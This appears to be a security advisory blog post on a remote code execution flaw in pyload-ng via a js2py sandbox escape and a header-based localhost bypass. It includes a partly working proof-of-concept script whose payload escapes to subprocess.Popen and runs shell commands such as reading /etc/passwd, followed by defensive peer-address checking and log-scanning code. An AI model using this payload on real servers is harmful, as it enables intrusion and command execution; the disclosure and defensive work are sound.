API Security Blog

pyload-ng vulnerable to RCE with js2py sandbox escape

Summary

Any pyload-ng instance running under Python 3.11 or below is vulnerable to RCE. An attacker can send a request containing an arbitrary shell command and the victim server will execute it immediately.

Details

js2py has a sandbox escape vulnerability, assigned CVE-2024-28397, and js2py is used by the /flash/addcrypted2 API endpoint of pyload-ng. Although this endpoint is designed to accept only localhost connections, the restriction can be bypassed using an HTTP header, which gives access to the API and achieves RCE.

PoC

The PoC is provided as poc.py below; you can modify the shell command it executes:

```python
import socket
import base64
from urllib.parse import quote

host, port = input("host: "), int(input("port: "))

payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;"
let hacked, bymarve, n11
let getattr, obj
hacked = Object.getOwnPropertyNames({})
bymarve = hacked.getattribute
n11 = bymarve("getattribute")
obj = n11("class").base
getattr = obj.getattribute

function findpopen(o) {
    let result;
    for(let i in o.subclasses()) {
        let item = o.subclasses()[i]
        if(item.module == "subprocess" && item.name == "Popen") {
            return item
        }
        if(item.name != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
function f() {
    return n11
}
"""

crypted_b64 = …
```
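The localhost restriction described above fails because the check can be influenced by something the client controls. As an added example (not code from pyload-ng or the advisory), the following enforces the check on the transport peer address only, never on request headers, and scans constructed access-log lines for non-loopback hits on the endpoint; the WSGI environ keys and the log format are assumptions.

```python
"""Defender-side checks for the /flash/addcrypted2 localhost restriction.

Added example; not pyload-ng code. Assumes a WSGI-style environ dict where
REMOTE_ADDR is the socket peer address, and a constructed access-log format.
"""
import ipaddress
import re

LOOPBACK = (ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("::1/128"))


def is_loopback(addr: str) -> bool:
    """True only for a real loopback address; unparsable input is rejected."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    # Edge case: IPv4-mapped IPv6 peers (::ffff:127.0.0.1) on dual-stack sockets.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return any(ip in net for net in LOOPBACK)


def allow_addcrypted2(environ: dict) -> bool:
    """Allow only when the socket peer is loopback. Host, X-Forwarded-For and
    any other HTTP_* header are deliberately ignored: the client sets them."""
    return is_loopback(environ.get("REMOTE_ADDR", ""))


# Constructed log format (assumption): client address, "METHOD path proto", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def flag_remote_addcrypted2(log_lines):
    """Return the log lines where a non-loopback peer reached /flash/addcrypted2."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["path"].startswith("/flash/addcrypted2") and not is_loopback(m["ip"]):
            hits.append(line)
    return hits


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '127.0.0.1 "POST /flash/addcrypted2 HTTP/1.1" 200',
    '203.0.113.7 "POST /flash/addcrypted2 HTTP/1.1" 200',
    '203.0.113.7 "GET /login HTTP/1.1" 200',
]

if __name__ == "__main__":
    print(flag_remote_addcrypted2(SAMPLE_LOG))
```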
